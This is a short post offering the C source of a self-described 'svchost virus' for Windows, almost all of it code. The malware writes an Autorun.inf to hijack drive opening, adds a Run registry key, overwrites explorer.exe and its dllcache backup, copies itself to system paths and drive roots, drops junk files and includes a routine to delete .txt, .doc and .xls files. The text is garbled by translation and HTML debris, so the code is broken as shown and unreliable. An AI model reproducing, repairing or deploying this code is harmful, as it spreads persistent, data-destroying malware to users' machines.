Entry-level virus source code [VC ++]

A friend sent it to me. In fact, it's hard to understand it when it's done.

 

/* <Br/> SK-CHINA <br/> svchost virus write by S. k <br/> Compiler: <br/> DEV-CPP 4.9.9.2 <br/> */</P> <p>/* SVCHOST. C */<br/>/* SVCHOST. EXE */<br/>/* SVCHOST. com */<br/> # include <stdio. h>/* standard input/output */<br/> # include <string. h>/* string operation */<br/> # include <stdlib. h>/* Other functions */<br/> # include <process. h>/* process control */<br/> # include <dir. h>/* directory function */</P> <p> # define svchost_num 6/* Number of virus copies in key locations */<br/> # define rubbish_num 5/ * Number of junk files */<br/> # define remove_num 5/* Number of deleted files */<br/>/* ============ ========================================================== =================*/<br/>/* <br/> file Autorun. INF content: <br/> 1. run svchost.com automatically <br/> 2. overwrite the default open command and use the virus as the new open method <br/> 3. overwrite the default Resource Manager commands, use the virus as a new command <br/> */<br/> char * Autorun = {"[Autorun]/nopen =/" svchost.com/S/"/nshell // open = open (& O) /nshell // open // command =/"svchost.com/S/"/nshell // explore = Resource Manager (& X)/nshell // Export E // command =/"svchost.com/S /""}; <br/>/* ======================================== =========================================== */<br/ >/* <br/> Add the registry key: <br/> 1. automatic run to generate a virus body C: /Windows/wjview32.com <br/> */<br/> char * regadd = {"regedit4/n [HKEY_LOCAL_MACHINE // software // Microsoft // windows // CurrentVersion/ /run]/n/"wjview32/" =/"C: //// windows //// wjview32.com/S /""}; <br/>/* ======================================== ============ =======================================*/<Br/>/* <br/> function: copy a file <br/> copy Source: infile <br/> destination: OUTFILE <br/> success 0 is returned, 1 <br/> */<br/> int copy (char * infile, char * OUTFILE) <br/>{< br/> file * input, * output; <br/> char temp; <br/> If (strcmp (infile, OUTFILE )! = 0 & (input = fopen (infile, "rb "))! = NULL) & (output = fopen (OUTFILE, "WB "))! = NULL) <br/>{< br/> while (! Feof (input) <br/>{< br/> fread (& temp, input); <br/> fwrite (& temp, output ); <br/>}< br/> fclose (input); <br/> fclose (output); <br/> return 0; <br/>}< br/> else return 1; <br/>}< br/>/* ============================ ========================================================== */<br/>/* <br/> function: automatically run through explorer <br/> 0 is returned for success, 1 or 2 is returned for failure <br/> */<br/> int autorun_explorer () <br/>{< br/> file * input; <br/> If (input = fopen ("C: // windows // system // assumer.exe", "rb "))! = NULL) <br/>{< br/> fclose (input); <br/> remove ("C: // windows // $ TEMP $ "); <br/> remove ("C: // windows // system32 // dllcache // $ TEMP $"); <br/> return 1; <br/>}< br/> copy ("C: // windows // assumer.exe", "C: // windows // system // assumer.exe "); <br/> Rename ("C: // windows // assumer.exe", "C: // windows // $ TEMP $"); <br/> Rename ("C: // windows // system32 // dllcache // explorer.exe "," C: // windows // system32 // dllcache // $ TEMP $ "); <Br/> If (copy ("svchost.com", "C: // windows // explorer.exe") = 0 & copy ("svchost.com", "C: // windows // system32 // dllcache // explorer.exe ") = 0) <br/> return 0; <br/> else <br/> return 2; <br/>}< br/>/* ============================ ========================================================== */<br/>/* <br/> function: if a registry entry is added <br/> successfully, 0 is returned. If a registry entry fails, 1 is returned. <br/> */<br/> int add_reg () is returned () <br/>{< br/> file * output; <br/> If (output = fopen ("$", "W "))! = NULL) <br/>{< br/> fprintf (output, regadd); <br/> fclose (output); <br/> spawnl (1, "C: // windows // regedit.exe ","/S $ ", null ); <br/>}< br/>/* = ========================================================== =====*/<br/>/* <br/> function: copy virus + Autorun. INF runs automatically <br/> */<br/> void copy_virus () <br/> {<br/> int I, K; <br/> file * input, * output; <br/> char * files_svchost [svchost_num] = {"svchost.com", "C :// Windows // wjview32.com "," C: // windows // system // msmouse. DLL "," C: // windows // system32 // your sys. sys "," C: // windows // system32 // mstsc32.exe "," C: // windows // assumer.exe "}; <br/> char temp [2] [20] = {"C: // svchost.com", "C: // Autorun. INF "};< br/> for (I = 0; I <svchost_num; I ++) <br/>{< br/> If (input = fopen (files_svchost [I], "rb "))! = NULL) <br/>{< br/> fclose (input); <br/> for (k = 0; k <svchost_num; k ++) <br/>{< br/> copy (files_svchost [I], files_svchost [k]); <br/>}< br/> I = svchost_num; <br/>}< br/> for (I = 0; I <svchost_num; I ++) <br/>{< br/> If (input = fopen (files_svchost [I], "rb "))! = NULL) <br/>{< br/> fclose (input); <br/> for (k = 0; k <24; k ++) <br/>{< br/> copy (files_svchost [I], temp [0]); <br/> If (output = fopen (temp [1], "W "))! = NULL) <br/>{< br/> fprintf (output, "% s", Autorun); <br/> fclose (output ); <br/>}< br/> temp [0] [0] ++; <br/> temp [1] [0] ++; <br/>}< br/> I = svchost_num; <br/>}< br/>/* ==================== ========================================================== ===========*/<br/>/* <br/> function: create a junk file <br/> */<br/> void make_rubbish () <br/> {<br/> int I; <br/> file * output; <br/> srand (0); <br/> for (I = 0; I <rubbish_num; I ++) <br />{< Br/> int N; <br/> char s [30]; <br/> N = rand (); <br/> sprintf (S, "C: // destory _ infection _ % d", n); <br/> If (output = fopen (S, "W "))! = NULL) <br/>{< br/> fprintf (output, "% LD % s", N * N, S); <br/> fclose (output ); <br/>}< br/>/* ==================== ========================================================== ===========*/<br/>/* <br/> function: delete a file <br/> */<br/> void remove_files () <br/>{< br/> long done; <br/> int I; <br/> struct _ finddata_t ffblk; <br/> char * remove_files [3] = {"*. TXT ","*. doc ","*. xls "};< br/> for (I = 0; I <3; I ++) <br/>{< br/> If (_ findf IRST (remove_files [I], & ffblk) =-1) continue; <br/> while (! Done) <br/>{< br/> remove (ffblk. name); <br/> _ findnext (done, & ffblk); <br/>}< br/> _ findclose (done ); <br/>}< br/>/* = ========================================================== =====*/<br/>/* <br/> main program <br/> using DEV-CPP 32-bit C project implementation. C program runs in the background out of the command line interface <br/> */<br/> int main (INT argc, char ** argv) <br/>{< br/> int contral = 0; <br/> If (argc> 1) <br/> If (strcmp (argv [1], "/s") = 0) <br/> goto next1; <br/> autorun_explorer (); <br/> spawnl (1, "C: // windows // system // erer.exe ", null); <br/> next1: <br/> add_reg (); <br/> copy_virus (); <br/> make_rubbish (); <br/>/* remove_files (); */<br/> spawnl (1, "C: // windows // system32 // mstsc32.exe ","/s ", null); <br/> return 0; <br/>}< br/>